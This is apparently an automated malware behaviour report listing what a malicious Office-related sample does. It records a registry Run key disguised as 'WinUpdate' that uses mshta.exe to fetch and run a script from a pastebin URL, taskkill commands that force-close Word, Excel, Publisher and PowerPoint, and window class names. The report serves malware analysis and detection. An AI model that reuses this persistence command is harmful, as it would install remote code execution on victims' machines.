Technical Information
- [<HKCU>\Software\Microsoft\Windows\CurrentVersion\Run] 'WinUpdate' = 'mshta.exe http://pastebin.com/raw/0KmXiaYK'
- '<SYSTEM32>\taskkill.exe' /f /im winword.exe
- '<SYSTEM32>\taskkill.exe' /f /im excel.exe
- '<SYSTEM32>\taskkill.exe' /f /im MSPUB.exe
- '<SYSTEM32>\taskkill.exe' /f /im POWERPNT.EXE
- ClassName: 'MS_AutodialMonitor' WindowName: ''
- ClassName: 'MS_WebcheckMonitor' WindowName: ''
- ClassName: '' WindowName: ''
- '<SYSTEM32>\cmd.exe' /c taskkill /f /im winword.exe & taskkill /f /im excel.exe & taskkill /f /im MSPUB.exe & taskkill /f /im POWERPNT.EXE & exit' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c taskkill /f /im winword.exe & taskkill /f /im excel.exe & taskkill /f /im MSPUB.exe & taskkill /f /im POWERPNT.EXE & exit